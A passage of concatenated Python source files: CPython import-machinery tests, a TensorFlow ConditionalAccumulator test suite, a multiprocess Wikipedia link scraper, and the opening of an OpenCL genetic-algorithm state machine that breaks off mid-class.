        self.assertIs(mod, _bootstrap)
        self.assertEqual(mod.__name__, 'importlib._bootstrap')
        self.assertEqual(mod.__package__, 'importlib')
        self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)

    def test_frozen_importlib_external_is_bootstrap_external(self):
        """Same identity check for the filesystem half of the bootstrap."""
        from importlib import _bootstrap_external
        mod = sys.modules['_frozen_importlib_external']
        self.assertIs(mod, _bootstrap_external)
        self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
        self.assertEqual(mod.__package__, 'importlib')
        self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)

    def test_there_can_be_only_one(self):
        # Issue #15386 revealed a tricky loophole in the bootstrapping
        # This test is technically redundant, since the bug caused importing
        # this test module to crash completely, but it helps prove the point
        from importlib import machinery
        mod = sys.modules['_frozen_importlib']
        self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
    """Test importlib._bootstrap_external._get_sourcefile() as used by the C API.

    Because this function serves a very narrow internal need, these are
    knowingly whitebox tests.
    """

    def test_get_sourcefile(self):
        # Given a valid bytecode path, return the path to the corresponding
        # source file if it exists.
        with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = True
            path = TESTFN + '.pyc'
            expect = TESTFN + '.py'
            self.assertEqual(_get_sourcefile(path), expect)

    def test_get_sourcefile_no_source(self):
        # Given a valid bytecode path without a corresponding source path,
        # return the original bytecode path.
        with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = False
            path = TESTFN + '.pyc'
            self.assertEqual(_get_sourcefile(path), path)

    def test_get_sourcefile_bad_ext(self):
        # Given a path with an invalid bytecode extension, return the
        # bytecode path passed as the argument.
        path = TESTFN + '.bad_ext'
        self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
    """Verify that tracebacks raised during import point at user-level
    frames, with importlib's internal frames stripped (issue #15425)."""

    def setUp(self):
        os.mkdir(TESTFN)
        self.old_path = sys.path[:]
        sys.path.insert(0, TESTFN)

    def tearDown(self):
        sys.path[:] = self.old_path
        rmtree(TESTFN)

    def create_module(self, mod, contents, ext=".py"):
        """Write a throwaway module under TESTFN and schedule its unload.

        Returns the path of the created file.
        """
        fname = os.path.join(TESTFN, mod + ext)
        with open(fname, "w") as f:
            f.write(contents)
        self.addCleanup(unload, mod)
        importlib.invalidate_caches()
        return fname

    def assert_traceback(self, tb, files):
        """Assert tb's frames come from exactly *files*, in order.

        Consecutive frames from the same file are collapsed; each entry
        in *files* is matched as a substring of the frame's filename.
        """
        deduped_files = []
        while tb:
            code = tb.tb_frame.f_code
            fn = code.co_filename
            if not deduped_files or fn != deduped_files[-1]:
                deduped_files.append(fn)
            tb = tb.tb_next
        self.assertEqual(len(deduped_files), len(files), deduped_files)
        for fn, pat in zip(deduped_files, files):
            self.assertIn(pat, fn)

    def test_nonexistent_module(self):
        """Missing top-level module: traceback shows only this file."""
        try:
            # assertRaises() clears __traceback__
            import nonexistent_xyzzy
        except ImportError as e:
            tb = e.__traceback__
        else:
            self.fail("ImportError should have been raised")
        self.assert_traceback(tb, [__file__])

    def test_nonexistent_module_nested(self):
        """Missing module imported by another: both frames visible."""
        self.create_module("foo", "import nonexistent_xyzzy")
        try:
            import foo
        except ImportError as e:
            tb = e.__traceback__
        else:
            self.fail("ImportError should have been raised")
        self.assert_traceback(tb, [__file__, 'foo.py'])

    def test_exec_failure(self):
        """Error while executing the imported module's body."""
        self.create_module("foo", "1/0")
        try:
            import foo
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ZeroDivisionError should have been raised")
        self.assert_traceback(tb, [__file__, 'foo.py'])

    def test_exec_failure_nested(self):
        """Error two imports deep: all three files appear in order."""
        self.create_module("foo", "import bar")
        self.create_module("bar", "1/0")
        try:
            import foo
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ZeroDivisionError should have been raised")
        self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])

    # A few more examples from issue #15425
    def test_syntax_error(self):
        """SyntaxError during compilation: only this file is in the tb."""
        self.create_module("foo", "invalid syntax is invalid")
        try:
            import foo
        except SyntaxError as e:
            tb = e.__traceback__
        else:
            self.fail("SyntaxError should have been raised")
        self.assert_traceback(tb, [__file__])

    def _setup_broken_package(self, parent, child):
        """Create package _parent_foo with given __init__/bar.py contents.

        Returns (init_path, bar_path).
        """
        pkg_name = "_parent_foo"
        self.addCleanup(unload, pkg_name)
        pkg_path = os.path.join(TESTFN, pkg_name)
        os.mkdir(pkg_path)
        # Touch the __init__.py
        init_path = os.path.join(pkg_path, '__init__.py')
        with open(init_path, 'w') as f:
            f.write(parent)
        bar_path = os.path.join(pkg_path, 'bar.py')
        with open(bar_path, 'w') as f:
            f.write(child)
        importlib.invalidate_caches()
        return init_path, bar_path

    def test_broken_submodule(self):
        """Failure inside a submodule's body."""
        init_path, bar_path = self._setup_broken_package("", "1/0")
        try:
            import _parent_foo.bar
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ZeroDivisionError should have been raised")
        self.assert_traceback(tb, [__file__, bar_path])

    def test_broken_from(self):
        """Same failure via `from pkg import mod` syntax."""
        init_path, bar_path = self._setup_broken_package("", "1/0")
        try:
            from _parent_foo import bar
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ImportError should have been raised")
        self.assert_traceback(tb, [__file__, bar_path])

    def test_broken_parent(self):
        """Failure inside the package __init__ itself."""
        init_path, bar_path = self._setup_broken_package("1/0", "")
        try:
            import _parent_foo.bar
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ZeroDivisionError should have been raised")
        self.assert_traceback(tb, [__file__, init_path])

    def test_broken_parent_from(self):
        """Failure inside __init__ via `from pkg import mod`."""
        init_path, bar_path = self._setup_broken_package("1/0", "")
        try:
            from _parent_foo import bar
        except ZeroDivisionError as e:
            tb = e.__traceback__
        else:
            self.fail("ZeroDivisionError should have been raised")
        self.assert_traceback(tb, [__file__, init_path])

    @cpython_only
    def test_import_bug(self):
        # We simulate a bug in importlib and check that it's not stripped
        # away from the traceback.
        self.create_module("foo", "")
        importlib = sys.modules['_frozen_importlib_external']
        if 'load_module' in vars(importlib.SourceLoader):
            old_exec_module = importlib.SourceLoader.exec_module
        else:
            old_exec_module = None
        try:
            def exec_module(*args):
                1/0
            importlib.SourceLoader.exec_module = exec_module
            try:
                import foo
            except ZeroDivisionError as e:
                tb = e.__traceback__
            else:
                self.fail("ZeroDivisionError should have been raised")
            # The injected importlib frame must stay visible in the tb.
            self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
        finally:
            # Restore the patched loader method either way.
            if old_exec_module is None:
                del importlib.SourceLoader.exec_module
            else:
                importlib.SourceLoader.exec_module = old_exec_module

    @unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
    def test_unencodable_filename(self):
        # Issue #11619: The Python parser and the import machinery must not
        # encode filenames, especially on Windows
        pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
        self.addCleanup(unlink, pyname)
        name = pyname[:-3]
        script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
                                       __isolated=False)
class CircularImportTests(unittest.TestCase):
    """See the docstrings of the modules being imported for the purpose of the
    test."""

    def tearDown(self):
        """Make sure no modules pre-exist in sys.modules which are being used to
        test."""
        for key in list(sys.modules.keys()):
            if key.startswith('test.test_import.data.circular_imports'):
                del sys.modules[key]

    def test_direct(self):
        """Two modules that relatively import each other must resolve."""
        try:
            import test.test_import.data.circular_imports.basic
        except ImportError:
            self.fail('circular import through relative imports failed')

    def test_indirect(self):
        """A relative import inside a module that takes part in a cycle."""
        try:
            import test.test_import.data.circular_imports.indirect
        except ImportError:
            self.fail('relative import in module contributing to circular '
                      'import failed')

    def test_subpackage(self):
        """A circular import spanning a subpackage boundary."""
        try:
            import test.test_import.data.circular_imports.subpackage
        except ImportError:
            self.fail('circular import involving a subpackage failed')

    def test_rebinding(self):
        """A cycle where a module attribute is rebound during import."""
        try:
            import test.test_import.data.circular_imports.rebinding as rebinding
        except ImportError:
            self.fail('circular import with rebinding of module attribute failed')
        from test.test_import.data.circular_imports.subpkg import util
        self.assertIs(util.util, rebinding.util)
# Script entry point: run every test class defined in this module.
if __name__ == '__main__':
    # Test needs to be a package, so we can do relative imports.
    unittest.main()
|
conditional_accumulator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
# from functools import reduce
class ConditionalAccumulatorTest(tf.test.TestCase):
  """Tests for tf.ConditionalAccumulator: construction, gradient
  accumulation/extraction, global-step gating, and concurrency.

  Fixes applied: deprecated ``assertEquals`` (removed in Python 3.12)
  replaced with ``assertEqual``; index-based loops replaced with
  direct/enumerate iteration.
  """

  def testConstructor(self):
    """Default construction produces the expected node_def."""
    with tf.Graph().as_default():
      q = tf.ConditionalAccumulator(tf.float32, name="Q")
    self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
    self.assertEqual(tf.string_ref, q.accumulator_ref.dtype)
    self.assertProtoEquals("""
      name:'Q' op:'ConditionalAccumulator'
      attr { key: 'dtype' value { type: DT_FLOAT } }
      attr { key: 'shape' value { shape { unknown_rank: true} } }
      attr { key: 'container' value { s: '' } }
      attr { key: 'shared_name' value { s: '' } }
      """, q.accumulator_ref.op.node_def)

  def testConstructorWithShape(self):
    """An explicit shape is recorded in the node_def attrs."""
    with tf.Graph().as_default():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1, 5, 2, 8]))
    self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
    self.assertEqual(tf.string_ref, q.accumulator_ref.dtype)
    self.assertProtoEquals("""
      name:'Q' op:'ConditionalAccumulator'
      attr { key: 'dtype' value { type: DT_FLOAT } }
      attr { key: 'shape' value { shape { dim {size: 1 }
                                          dim {size: 5 }
                                          dim {size: 2 }
                                          dim {size: 8 }
      } } }
      attr { key: 'container' value { s: '' } }
      attr { key: 'shared_name' value { s: '' } }
      """, q.accumulator_ref.op.node_def)

  def testAccumulatorSizeEmpty(self):
    """A fresh accumulator reports zero accumulated gradients."""
    with self.test_session():
      q = tf.ConditionalAccumulator(tf.float32, name="Q")
      self.assertEqual(q.num_accumulated().eval(), 0)

  def testAccumulatorSetGlobalStep(self):
    """set_global_step runs without error."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      set_global_step_op = q.set_global_step(1)
      set_global_step_op.run()

  def testAccumulatorApplyGradFloat32(self):
    """apply_grad on a float32 accumulator runs without error."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      accum_op.run()

  def testDtypes(self):
    """take_grad averages correctly for every supported float dtype."""
    with self.test_session() as sess:
      dtypes = [tf.float16, tf.float32, tf.float64]
      for dtype in dtypes:
        q = tf.ConditionalAccumulator(dtype, shape=tf.TensorShape([1]))
        elems = np.arange(10).astype(dtype.as_numpy_dtype)
        for e in elems:
          q.apply_grad((e,)).run()
        result = sess.run(q.take_grad(1))
        self.assertEqual(sum(elems) / len(elems), result)

  def testAccumulatorMultipleAccumulators(self):
    """Several accumulators (even same-named) stay independent."""
    with self.test_session():
      q_f32_0 = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      q_f32_1 = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      q_f16_0 = tf.ConditionalAccumulator(
          tf.float16, name="Q", shape=tf.TensorShape([1]))
      q_f16_1 = tf.ConditionalAccumulator(
          tf.float16, name="Q", shape=tf.TensorShape([1]))
      accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
      # Give each accumulator a distinct value, then read each back.
      for i, accum in enumerate(accums):
        accum.apply_grad((i + 10.0,)).run()
      for i, accum in enumerate(accums):
        result = accum.take_grad(1).eval()
        self.assertEqual(result, i + 10.0)

  def testAccumulatorApplyAndTakeGradWithShape(self):
    """Element-wise averaging of shaped gradients."""
    with self.test_session():
      q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
      elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
               [[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
      elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
                   for x, y in zip(elems[0], elems[1])]
      accum_ops = [q.apply_grad(x) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      is_all_equal = True
      val = takeg_t.eval()
      for i in range(len(val)):
        for j in range(len(val[i])):
          is_all_equal &= (val[i][j] == elems_ave[i][j])
      self.assertTrue(is_all_equal)

  def testAccumulatorApplyGradWithWrongShape(self):
    """Applying a gradient of the wrong static shape raises ValueError."""
    q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
    with self.assertRaises(ValueError):
      q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
    with self.assertRaises(ValueError):
      q.apply_grad([[1.0], [2.0], [3.0]])

  def testAccumulatorDynamicShape(self):
    """With shape=None the accumulator accepts dynamically shaped grads."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
      x = tf.placeholder(tf.float32)
      accum_op = q.apply_grad(x)
      elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
               [[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
      elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
                   for c, d in zip(elems[0], elems[1])]
      takeg_t = q.take_grad(1)
      for elem in elems:
        sess.run(accum_op, feed_dict={x: elem})
      is_all_equal = True
      val = takeg_t.eval()
      for i in range(len(val)):
        for j in range(len(val[i])):
          is_all_equal &= (val[i][j] == elems_ave[i][j])
      self.assertTrue(is_all_equal)

  def testAccumulatorWrongDynamicShape(self):
    """Mismatched shapes after the first apply_grad fail at run time."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
      x = tf.placeholder(tf.float32)
      accum_op = q.apply_grad(x)
      # First successful apply_grad determines shape
      sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
      with self.assertRaises(tf.errors.InvalidArgumentError):
        sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
      with self.assertRaises(tf.errors.InvalidArgumentError):
        sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})

  def testAccumulatorSizeAfterApplyGrad(self):
    """num_accumulated increments once per applied gradient."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      self.assertEqual(q.num_accumulated().eval(), 0)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 1)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 2)

  def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
    """take_grad resets num_accumulated to zero on success."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      extract_t = q.take_grad(2)
      # Applying gradient multiple times to increase size from 0 to 2.
      self.assertEqual(q.num_accumulated().eval(), 0)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 1)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 2)
      # Extract will reduce size to 0
      extract_t.op.run()
      self.assertEqual(q.num_accumulated().eval(), 0)
      # Take gradients always sets the size back to 0 if successful.
      accum_op = q.apply_grad((10.0,), local_step=1)
      accum_op.run()
      accum_op.run()
      accum_op.run()
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 4)
      extract_t.op.run()
      self.assertEqual(q.num_accumulated().eval(), 0)

  def testAccumulatorTakeGrad(self):
    """take_grad returns the average of applied gradients."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [10.0, 20.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = takeg_t.eval()
      self.assertEqual(elems_ave, val)
      # Also works when num_required is a Tensor.
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(tf.constant(1))
      for accum_op in accum_ops:
        accum_op.run()
      val = takeg_t.eval()
      self.assertEqual(elems_ave, val)

  def testAccumulatorInvalidTakeGrad(self):
    """A negative num_required is rejected at run time."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [10.0, 20.0]
      accum_ops = [q.apply_grad((x,)) for x in elems]
      takeg_t = q.take_grad(-1)
      for accum_op in accum_ops:
        accum_op.run()
      with self.assertRaises(tf.errors.InvalidArgumentError):
        takeg_t.eval()

  def testAccumulatorRepeatedTakeGrad(self):
    """Repeated accumulate/extract cycles produce fresh averages."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [10.0, 20.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = takeg_t.eval()
      self.assertEqual(elems_ave, val)
      elems = [20.0, 30.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = takeg_t.eval()
      self.assertEqual(elems_ave + 0.0, val)

  def testAccumulatorIncrementGlobalStep(self):
    """set_global_step can track an incrementing global-step variable."""
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      global_step = tf.Variable(0, name="global_step")
      new_global_step = tf.add(global_step, 1)
      inc_global_step = tf.assign(global_step, new_global_step)
      set_global_step_op = q.set_global_step(new_global_step)
      tf.global_variables_initializer().run()
      for _ in range(3):
        set_global_step_op.run()
        inc_global_step.eval()

  def testAccumulatorSetGlobalStepPreventsAccumulation(self):
    """Gradients with local_step older than the global step are dropped.

    After the loop, `ls` holds the final (largest) global step, so only
    gradients with local_step >= ls contribute to the average.
    """
    with self.test_session():
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      local_steps = range(1000, 1005)
      accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
      for ls in local_steps:
        set_global_step_op = q.set_global_step(ls)
        set_global_step_op.run()
      for accum_op in accum_ops:
        accum_op.run()
      takeg_t = q.take_grad(1)
      val = takeg_t.eval()
      self.assertEqual(0.0 + sum(x for x in local_steps
                                 if x >= ls) / sum(1 for x in local_steps
                                                   if x >= ls), val)

  def testParallelApplyGrad(self):
    """Concurrent apply_grad calls all contribute to the average."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)

      def apply_grad(accum_op):
        sess.run(accum_op)

      threads = [self.checkedThread(
          target=apply_grad, args=(o,)) for o in accum_ops]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      val = takeg_t.eval()
      self.assertEqual(val, sum(elems) / len(elems))

  def testParallelTakeGrad(self):
    """Many blocked take_grad calls each get one accumulated value."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [e for e in range(10)]
      accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
      takeg_t = q.take_grad(1)

      def apply_grad():
        # Feed gradients slowly so takers block and are released one by one.
        for accum_op in accum_ops:
          time.sleep(1.0)
          sess.run(accum_op)

      apply_grad_thread = self.checkedThread(target=apply_grad)
      results = []

      def take_grad():
        results.append(sess.run(takeg_t))

      threads = [self.checkedThread(target=take_grad) for _ in range(10)]
      for thread in threads:
        thread.start()
      apply_grad_thread.start()
      for thread in threads:
        thread.join()
      apply_grad_thread.join()
      self.assertItemsEqual(elems, results)

  def testAccumulatorApplyAndBlockingTake(self):
    """take_grad blocks until the required number of grads arrives."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      elems = [10.0, 20.0, 30.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(3)

      def apply_grad():
        time.sleep(1.0)
        for accum_op in accum_ops:
          sess.run(accum_op)

      return_array = []

      def take_grad():
        return_array.append(sess.run(takeg_t))

      accum_thread = self.checkedThread(target=apply_grad)
      takeg_thread = self.checkedThread(target=take_grad)
      accum_thread.start()
      takeg_thread.start()
      accum_thread.join()
      takeg_thread.join()
      self.assertEqual([elems_ave], return_array)

  def _blocking_takeg(self, sess, takeg_op):
    """Run a take_grad that is expected to be cancelled."""
    with self.assertRaisesOpError("TakeGrad operation was cancelled"):
      sess.run(takeg_op)

  def testAccumulatorCancel(self):
    """Closing the session cancels a blocked take_grad."""
    with self.test_session() as sess:
      q = tf.ConditionalAccumulator(
          tf.float32, name="Q", shape=tf.TensorShape([1]))
      takeg_t = q.take_grad(1)
      takeg_thread = self.checkedThread(
          self._blocking_takeg, args=(sess, takeg_t))
      takeg_thread.start()
      time.sleep(1.0)
      sess.close()  # Will cancel blocked operation
      takeg_thread.join()
# Script entry point: run the TensorFlow test driver.
if __name__ == "__main__":
  tf.test.main()
|
multiprocess_queue.py |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import random
from multiprocessing import Process, Queue
import os
import time
def task_delegator(taskQueue, foundUrlsQueue):
    """Seed the task queue and forward newly discovered, unvisited wiki
    paths from the scrapers back onto the task queue (runs forever)."""
    # One seed task per scraper process; both count as already visited.
    seeds = ['/wiki/Kevin_Bacon', '/wiki/Monty_Python']
    visited = list(seeds)
    for seed in seeds:
        taskQueue.put(seed)
    while True:
        # Drain one batch of links reported by a scraper, if any.
        if not foundUrlsQueue.empty():
            for link in foundUrlsQueue.get():
                if link not in visited:
                    # Schedule the new link and remember it to avoid repeats.
                    taskQueue.put(link)
                    visited.append(link)
def get_links(bsObj):
    """Return the href of every internal /wiki/ link (no namespace
    colons) found inside the page's bodyContent div."""
    body = bsObj.find('div', {'id': 'bodyContent'})
    internal_wiki = re.compile('^(/wiki/)((?!:).)*$')
    anchors = body.find_all('a', href=internal_wiki)
    return [anchor.attrs['href'] for anchor in anchors]
def scrape_article(taskQueue, foundUrlsQueue):
    """Worker loop: fetch each assigned Wikipedia article, print its
    title, and report its internal links to the delegator (runs forever)."""
    while True:
        # Poll (100 ms) until the delegator supplies work; in practice
        # the task queue is rarely empty.
        while taskQueue.empty():
            time.sleep(.1)
        article_path = taskQueue.get()
        page = urlopen('http://en.wikipedia.org{}'.format(article_path))
        # Throttle between requests to be polite to the server.
        time.sleep(5)
        soup = BeautifulSoup(page, 'html.parser')
        heading = soup.find('h1').get_text()
        print('Scraping {} in process {}'.format(heading, os.getpid()))
        # Hand every discovered link to the delegator for deduplication.
        foundUrlsQueue.put(get_links(soup))
# Process spawning must be guarded: under the "spawn" start method
# (default on Windows and macOS) each child re-imports this module, and
# unguarded Process(...).start() at module level would recursively spawn
# processes. See the multiprocessing "safe importing of main module"
# programming guideline.
if __name__ == '__main__':
    taskQueue = Queue()
    foundUrlsQueue = Queue()
    # One delegator plus two scraper workers sharing the same queues.
    processes = [
        Process(target=task_delegator, args=(taskQueue, foundUrlsQueue)),
        Process(target=scrape_article, args=(taskQueue, foundUrlsQueue)),
        Process(target=scrape_article, args=(taskQueue, foundUrlsQueue)),
    ]
    for p in processes:
        p.start()
|
ocl_ga.py | #!/usr/bin/python3
import functools
import os
import pickle
import random
import sys
import threading
import time
import zlib

import numpy
import pyopencl as cl

from . import utils
from .utilities.generaltaskthread import TaskThread, Task, Logger
## A decorator class to notify state change before/after the action.
#  Fixes: the wrapper now propagates the wrapped function's return value
#  (previously discarded) and preserves its metadata via functools.wraps.
class EnterExit(object):
    def __call__(self, func):
        @functools.wraps(func)
        def wrapper(parent, *args, **kwargs):
            # Announce the action so the state machine can transition,
            # run the action, then signal completion.
            parent.state_machine.next(func.__name__)
            result = func(parent, *args, **kwargs)
            parent.state_machine.next('done')
            return result
        return wrapper
## A class which manages the state transition.
# @var openclga The OpenCLGA instance
# @var __curr_state Current state.
class StateMachine(Logger):
    """Drives state transitions for an OpenCLGA instance and reports each
    change back to the UI through the 'state' action callback."""

    # (current state, action) : (next state)
    # NOTE(review): the parentheses on the right-hand side do NOT create
    # tuples -- every value is just the next-state string.
    TRANSITION_TABLE = {
        ('waiting', 'prepare') : ('preparing'),
        ('waiting', 'restore') : ('restoring'),
        ('preparing', 'done') : ('prepared'),
        ('prepared', 'run') : ('running'),
        ('restoring', 'done') : ('prepared'),
        ('running', 'pause') : ('pausing'),
        ('running', 'stop') : ('stopping'),
        ('pausing', 'done') : ('paused'),
        ('paused', 'run') : ('running'),
        ('paused', 'stop') : ('stopping'),
        ('paused', 'save') : ('saving'),
        ('stopping', 'done') : ('stopped'),
        ('saving', 'done') : ('paused'),
    }

    def __init__(self, openclga, init_state):
        # openclga:   the owning OpenCLGA instance (queried for callbacks).
        # init_state: name of the initial state, e.g. 'waiting'.
        Logger.__init__(self)
        self.openclga = openclga
        self.__curr_state = init_state

    ## Transit to next state if (current state, action) is matched.
    # After state changes, notify the change back to UI.
    # @param action Could be the name of function or 'done'
    def next(self, action):
        next_state = None
        for k, v in StateMachine.TRANSITION_TABLE.items():
            if self.__curr_state == k[0] and action == k[1]:
                # At most one transition may match a (state, action) pair.
                assert next_state is None
                next_state = v
        if next_state is None:
            # Unrecognized action for the current state: ignore silently.
            return
        last_state = self.__curr_state
        self.__curr_state = next_state
        self.info('Change State : {} => {}'.format(last_state, next_state))
        # Push the new state to the registered UI callback, if any.
        if self.openclga.action_callbacks and 'state' in self.openclga.action_callbacks:
            self.openclga.action_callbacks['state'](next_state)

    def is_running(self):
        # True only while in the 'running' state.
        return self.__curr_state == 'running'
## A task to iterate GA generation in a separated thread.
class GARun(Task):
    def __init__(self, ga, prob_mutation, prob_crossover, callback):
        # ga:             the OpenCLGA instance whose evolution loop we drive.
        # prob_mutation:  per-generation mutation probability.
        # prob_crossover: per-generation crossover probability.
        # callback:       invoked once when the evolution loop finishes.
        Task.__init__(self)
        self.ga = ga
        self.prob_m = prob_mutation
        self.prob_c = prob_crossover
        self.end_of_run = callback
        pass

    def run(self):
        """Execute the evolution loop and accumulate elapsed wall time."""
        start_time = time.time()
        # No need to generate new population for pause or restore.
        self.ga._generate_population_if_needed(self.prob_m, self.prob_c)
        self.ga._start_evolution(self.prob_m, self.prob_c)
        self.ga._elapsed_time += time.time() - start_time
        self.end_of_run()
## Implementation of the flow of GA on OpenCL.
# Initialize opencl command queue, collect include path, build programs.
# @param options Used to initialize all member variables
# @param action_callbacks Called when state is changed and carry execution status
# back to ocl_ga_worker.
class OpenCLGA():
    def __init__(self, options, action_callbacks = {}):
        """Initialize members, the OpenCL context/queue, and build kernels.

        options          -- configuration dict (sample_chromosome,
                            termination, population, fitness_func, ...).
        action_callbacks -- dict of callables keyed by action name
                            (e.g. 'state'), invoked on state changes.
        """
        # NOTE(review): mutable default argument -- all instances created
        # without the argument share one dict; confirm before relying on it.
        if action_callbacks is not None:
            for action, cb in action_callbacks.items():
                assert callable(cb)
        self.state_machine = StateMachine(self, 'waiting')
        self.__init_members(options)
        extra_path = options.get('extra_include_path', [])
        cl_context = options.get('cl_context', None)
        self.__init_cl(cl_context, extra_path)
        self.__create_program()
        self.action_callbacks = action_callbacks
## public properties
    @property
    def paused(self):
        """True while the GA loop is paused (set by pause handling)."""
        return self._paused
    @property
    def elapsed_time(self):
        """Total wall-clock seconds spent inside the evolution loop."""
        return self._elapsed_time
## private properties
    @property
    def __early_terminated(self):
        """Delegate early-termination decision to the sample chromosome,
        based on the current best/worst fitness values."""
        return self.__sample_chromosome.early_terminated(self.__best_fitnesses[0],
                                                         self.__worst_fitnesses[0])
    @property
    def __args_codes(self):
        """OpenCL #define selecting maximization (1) vs minimization (0)."""
        opt_for_max = 0 if self.__opt_for_max == 'min' else 1
        return '#define OPTIMIZATION_FOR_MAX ' + str(opt_for_max) + '\n'
    @property
    def __populate_codes(self):
        """OpenCL #defines for population size and the chromosome struct."""
        return '#define POPULATION_SIZE ' + str(self.__population) + '\n' +\
               '#define CHROMOSOME_TYPE ' + self.__sample_chromosome.struct_name + '\n'
    @property
    def __evaluate_code(self):
        """OpenCL #defines wiring the user fitness function and its
        optional extra buffer arguments into the kernel source."""
